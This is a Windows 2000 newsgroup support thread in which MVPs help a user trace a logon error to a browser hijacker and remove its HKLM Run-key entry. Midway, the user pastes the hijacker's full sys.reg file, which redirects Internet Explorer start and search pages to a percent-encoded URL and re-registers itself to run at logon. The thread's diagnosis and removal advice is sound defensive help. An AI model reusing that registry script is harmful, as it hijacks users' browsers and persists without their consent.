'cannot import sys reg' for logon of restricted user auth

  • Thread starter Thread starter rbd
  • Start date Start date
R

rbd

Hi folks,
Please help. I used to logon to my window 2000 system as
an administrator until I recently learned this is not
wise. So, I changed the authority of my session to
restricted and every time I logon an error occurs:
'Registry Editor, Cannot import sys reg: Not all data was
successfully written to the registry. Some keys are open
by the system or other processes.'. When I logon any uid
that has admin auth, the error does'nt occur. Could this
be a virus or trojan horse installing some code on my
system? Any suggestions on what to do?

Thanks in advance for your help,
RBD
 
Spyware. Natively you can; Start\Settings\Control Panel\Administrative
Tools\Computer Management(Local)\System Information\Software
Environment\Startup Programs|View|Advanced, then in the "Location" column,
you'll find the path to the "Startup" location either in the "Startup"
directories or from the registry's "Run" keys.

%ALLUSERSPROFILE%\Start Menu\Programs\Startup
%USERPROFILE%\Start Menu\Programs\Startup

You can delete the shortcuts that you no longer want to run.


HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

You can delete the string value for the program you no longer want to run.

or copy msconfig from Windows XP


--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect


:
| Hi folks,
| Please help. I used to logon to my window 2000 system as
| an administrator until I recently learned this is not
| wise. So, I changed the authority of my session to
| restricted and every time I logon an error occurs:
| 'Registry Editor, Cannot import sys reg: Not all data was
| successfully written to the registry. Some keys are open
| by the system or other processes.'. When I logon any uid
| that has admin auth, the error does'nt occur. Could this
| be a virus or trojan horse installing some code on my
| system? Any suggestions on what to do?
|
| Thanks in advance for your help,
| RBD
 
Dave, Thanks.
I haven't found the violation yet but I did notice that
Task Manager indicates the REGEDIT application/program is
active at the time of the error.
Would I be correct in assuming that it is not a normal
functions of Windows 2000 to be executing the Regedit
program at logon time?
Why wouldn't Norton Antivirus detect this?

Thanks once again.
 
In said:
Dave, Thanks.
I haven't found the violation yet but I did notice that
Task Manager indicates the REGEDIT application/program is
active at the time of the error.
Would I be correct in assuming that it is not a normal
functions of Windows 2000 to be executing the Regedit
program at logon time?
Click to expand...

Not normally. (But possible via GPO or logon scripts)
Why wouldn't Norton Antivirus detect this?
Click to expand...

Either there is something that NAV cannot detect, or more likely what
you see is left over from some earlier malware.

Did you ustilize msconfig.exe or another Startup Manager such as
Autoruns
http://www.sysinternals.com/ntw2k/freeware/autoruns.shtml
to locate the registry entry or shortcut file that is executing
regedit.exe? And remove it.
 
No not normal. Probably the user doesn't have registry editing rights hence
the spyware install is failing. As far as I know NAV, by itself, doesn't do
spyware.

--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect


:
|
| Dave, Thanks.
| I haven't found the violation yet but I did notice that
| Task Manager indicates the REGEDIT application/program is
| active at the time of the error.
| Would I be correct in assuming that it is not a normal
| functions of Windows 2000 to be executing the Regedit
| program at logon time?
| Why wouldn't Norton Antivirus detect this?
|
| Thanks once again.
 
Hi Dave and thanks so much again for time. I listed what
is in the startup under each logon situation and indeed
the command 'regedit -s sys.reg' is present in both lists.
When I entered the command manually with restricted user
attributes it did indeed cause the same error. Would you
mind glancing at the contents of the 2 lists to see if you
see anything suspicious in addition. Any reason I
shouldn't just delete the entry from startup or is it
providing a necessary function?


From logon Robert attrib 'restricted user'

Program Command User Name Location
Billminder c:\progra~1\billmind.exe
FM9Y10B\****************** Startup
uoltray c:\program files\netzero\exec.exe regrun
FM9Y10B\****************** HKU\S-1-5-21-
343818398-1708537768-1801674531-1000
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Adobe Gamma Loader c:\progra~1\common~1\adobe\calibr~1
\adobeg~1.exe All Users Common Startup
Synchronization Manager mobsync.exe /logon All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Matrox Powerdesk c:\winnt\system32
\pdesk\pdesk.exe /autolaunch All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Ink Monitor c:\program files\epson\ink
monitor\inkmonitor.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NeroCheck c:\winnt\system32\nerocheck.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
InCD c:\program files\ahead\incd\incd.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RealJukeboxSystray "c:\program
files\real\realjukebox\tsystray.exe" All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sys regedit -s sys.reg All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RealTray c:\program files\realaudio8.0\realplayer8.0
\realplay.exe systemboothideplayer All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ccApp "c:\program files\common files\symantec
shared\ccapp.exe" All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


From logon as administrator:

Program Command User Name Location
Adobe Gamma Loader c:\progra~1\common~1\adobe\calibr~1
\adobeg~1.exe All Users Common Startup
Synchronization Manager mobsync.exe /logon All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Matrox Powerdesk c:\winnt\system32
\pdesk\pdesk.exe /autolaunch All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Ink Monitor c:\program files\epson\ink
monitor\inkmonitor.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NeroCheck c:\winnt\system32\nerocheck.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
InCD c:\program files\ahead\incd\incd.exe All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RealJukeboxSystray "c:\program
files\real\realjukebox\tsystray.exe" All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sys regedit -s sys.reg All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RealTray c:\program files\realaudio8.0\realplayer8.0
\realplay.exe systemboothideplayer All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ccApp "c:\program files\common files\symantec
shared\ccapp.exe" All Users
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Regards,
Robert
 
Yes without question get rid of this one. As far as I can tell the rest
looks reasonable.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sys regedit -s sys.reg
All Users

--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect


| Hi Dave and thanks so much again for time. I listed what
| is in the startup under each logon situation and indeed
| the command 'regedit -s sys.reg' is present in both lists.
| When I entered the command manually with restricted user
| attributes it did indeed cause the same error. Would you
| mind glancing at the contents of the 2 lists to see if you
| see anything suspicious in addition. Any reason I
| shouldn't just delete the entry from startup or is it
| providing a necessary function?
|
|
| From logon Robert attrib 'restricted user'
|
| Program Command User Name Location
| Billminder c:\progra~1\billmind.exe
| FM9Y10B\****************** Startup
| uoltray c:\program files\netzero\exec.exe regrun
| FM9Y10B\****************** HKU\S-1-5-21-
| 343818398-1708537768-1801674531-1000
| \SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| Adobe Gamma Loader c:\progra~1\common~1\adobe\calibr~1
| \adobeg~1.exe All Users Common Startup
| Synchronization Manager mobsync.exe /logon All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| Matrox Powerdesk c:\winnt\system32
| \pdesk\pdesk.exe /autolaunch All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| Ink Monitor c:\program files\epson\ink
| monitor\inkmonitor.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| NeroCheck c:\winnt\system32\nerocheck.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| InCD c:\program files\ahead\incd\incd.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| RealJukeboxSystray "c:\program
| files\real\realjukebox\tsystray.exe" All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| sys regedit -s sys.reg All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| RealTray c:\program files\realaudio8.0\realplayer8.0
| \realplay.exe systemboothideplayer All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| ccApp "c:\program files\common files\symantec
| shared\ccapp.exe" All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
| From logon as administrator:
|
| Program Command User Name Location
| Adobe Gamma Loader c:\progra~1\common~1\adobe\calibr~1
| \adobeg~1.exe All Users Common Startup
| Synchronization Manager mobsync.exe /logon All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| Matrox Powerdesk c:\winnt\system32
| \pdesk\pdesk.exe /autolaunch All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| Ink Monitor c:\program files\epson\ink
| monitor\inkmonitor.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| NeroCheck c:\winnt\system32\nerocheck.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| InCD c:\program files\ahead\incd\incd.exe All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| RealJukeboxSystray "c:\program
| files\real\realjukebox\tsystray.exe" All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| sys regedit -s sys.reg All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| RealTray c:\program files\realaudio8.0\realplayer8.0
| \realplay.exe systemboothideplayer All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
| ccApp "c:\program files\common files\symantec
| shared\ccapp.exe" All Users
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
| Regards,
| Robert
 
If you can search out the file 'sys.reg' you'll want to also delete it.
Before you do, can you right-click and choose edit then copy the file
content and paste in the body of a reply so we can have a look at it.

--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect
 
I take it the command 'regedit -s sys.reg' references this
file. I did a search on sys.reg for which Window Explorer
returned the file 'sys'. It looks like it is monkeying
with the Internet Explorer pages. To confirm, I should
delete this file as well as the command?


This is the contents of that file:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main]
"Start Page"="http://xmerdi.t.rac%
6B%2E%63%63/%68%70%2E%70%68%70"
"HOMEOldSP"="http://xmerdi.t.rac%
6B%2E%63%63/%68%70%2E%70%68%70"
"Search Bar"="http://xmerdi.t.rac%
6B%2E%63%63/%73%70%2E%70%68%70"
"Search Page"="http://xmerdi.t.rac%
6B%2E%63%63/%73%70%2E%70%68%70"
[HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Search]
"SearchAssistant"="http://xmerdi.t.r%
61%63%6B%2E%63%63/%73%70%2E%70%68%70"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
Explorer\Main]
"Start Page"="http://xmerdi.t.rac%
6B%2E%63%63/%68%70%2E%70%68%70"
"HOMEOldSP"="http://xmerdi.t.rac%
6B%2E%63%63/%68%70%2E%70%68%70"
"Search Bar"="http://xmerdi.t.rac%
6B%2E%63%63/%73%70%2E%70%68%70"
"Search Page"="http://xmerdi.t.rac%
6B%2E%63%63/%73%70%2E%70%68%70"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
Explorer\Search]
"SearchAssistant"="http://xmerdi.t.r%
61%63%6B%2E%63%63/%73%70%2E%70%68%70"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
on\Run]
"sys"="regedit -s sys.reg"

Regards,
Robert
 
I take it the command 'regedit -s sys.reg' references this
file. I did a search on sys.reg for which Window Explorer
returned the file 'sys'. It looks like it is monkeying
with the Internet Explorer pages. To confirm, I should
delete this file as well as the command?

This is the contents of that file:

[snip registry file that messes with the IE configuration]
Click to expand...

Hi

Yes, you should delete the file sys.reg, it is part
of the hijacker application.


--
torgeir
Microsoft MVP Scripting and WMI, Porsgrunn Norway
Administration scripting examples and an ONLINE version of the 1328 page
Scripting Guide:
http://www.microsoft.com/technet/community/scriptcenter/default.mspx
 
| I take it the command 'regedit -s sys.reg' references this
| file.
* Yes, it does.

I did a search on sys.reg for which Window Explorer
| returned the file 'sys'.
* It may be that you have Windows Explorer set to 'Hide extensions for known
file types' hence the file 'sys' didn't show it's extension.

It looks like it is monkeying
| with the Internet Explorer pages. To confirm, I should
| delete this file as well as the command?
* Yes, it is hijacking your start page, search page, etc. at every logon.
Deleting the 'Run" key string effectively disables it but I would delete the
file as well.

Thanks for posting the contents for us to see.



--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect
 
Hi Dave,
I have no right to bother you anymore I know but I could
use your help. I deleted the file being referenced but I
don't understand Windows enough to locate the command. I
first searched the Start up files- results= not found. I
then did a search of the entire harddrive and could not
find the command except in the file I deleted. It is,
however, being executed (i.e., with a new error- it can't
find the file). Would you and could you recommand a good
source to help me understand the area of Windows 2000 you
speak of or point me in the right direction.

Regards,
Robert
 
You need to delete the line from the registry. Run regedit.exe and navigate
to
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

and delete the Reg_Sz string
sys regedit -s sys.reg

Alternately this tool may help you now and in the future.
http://www.sysinternals.com/ntw2k/freeware/autoruns.shtml

--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect


|
| Hi Dave,
| I have no right to bother you anymore I know but I could
| use your help. I deleted the file being referenced but I
| don't understand Windows enough to locate the command. I
| first searched the Start up files- results= not found. I
| then did a search of the entire harddrive and could not
| find the command except in the file I deleted. It is,
| however, being executed (i.e., with a new error- it can't
| find the file). Would you and could you recommand a good
| source to help me understand the area of Windows 2000 you
| speak of or point me in the right direction.
|
| Regards,
| Robert
|
 
Hi Dave,
I think I did it. I finally figured out it was in the
registry and that HKLM meant the registry local machine
keys. I followed the registry entries down to
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and
found the entry. I simply deleted it and the command
stopped executing. Is this the way to accomplish this task?
Thanks,
Robert
 
Yes, exactly.

--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft MVP [Windows]
Microsoft Certified Professional [Windows 2000]
http://www.microsoft.com/protect


|
| Hi Dave,
| I think I did it. I finally figured out it was in the
| registry and that HKLM meant the registry local machine
| keys. I followed the registry entries down to
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and
| found the entry. I simply deleted it and the command
| stopped executing. Is this the way to accomplish this task?
| Thanks,
| Robert
 
Spyware. Natively you can; Start\Settings\Control Panel\Administrative
Tools\Computer Management(Local)\System Information\Software
Environment\Startup Programs|View|Advanced, then in the "Location" column,
you'll find the path to the "Startup" location either in the "Startup"
directories or from the registry's "Run" keys.

%ALLUSERSPROFILE%\Start Menu\Programs\Startup
%USERPROFILE%\Start Menu\Programs\Startup

You can delete the shortcuts that you no longer want to run.


HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

You can delete the string value for the program you no longer want to run.

or copy msconfig from Windows XP to the "windows" directory


--
Regards,

Dave Patrick ....Please no email replies - reply in newsgroup.
Microsoft Certified Professional
Microsoft MVP [Windows]
http://www.microsoft.com/protect


:
| send me a solution....
 
Back
Top